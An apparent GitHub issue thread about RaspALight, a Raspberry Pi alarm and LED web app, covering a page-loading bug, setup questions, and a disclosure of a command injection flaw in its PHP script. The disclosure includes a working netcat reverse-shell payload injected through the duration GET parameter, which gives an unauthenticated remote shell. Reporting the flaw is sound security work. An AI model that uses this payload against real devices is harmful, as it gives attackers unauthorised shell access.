When setting an alarm, the php script is excecuting a python file. Since this file is waiting for the alarm to begin, the php file would excecute the file till the end. So to stop the loading, you have to click on the alarm headline. Not optimal, but for now it does what it is supposed to do.
Trying to fix this, so that if you set an Alarm, you will be redirected again to the main page.
an attacker could open a shell through netcat with the duration-GET-parameter set to ; nc -c /bin/sh <your IP> <any unfiltered port>.
Think about a scenario where the RaspALight runs on 10.1.1.7 and the attackers IP is 10.1.1.1. When you run nc -l -p 1337 -vvv on the attackers machine and open the url http://10.1.1.7/ledcontrol/index.php?time=1309&date=20170401&duration=; nc -c /bin/sh 10.1.1.1 1337, you get a remote shell without authenticating yourself.
The same is working in the following line with the abort-GET-parameter:
could you give some additional information please about the settings, using or a howto. How I marry your solution with jgarff/rpi_ws281x.
Should I use apache2 on the raspi or can I use another webserver, which are rules the raspi?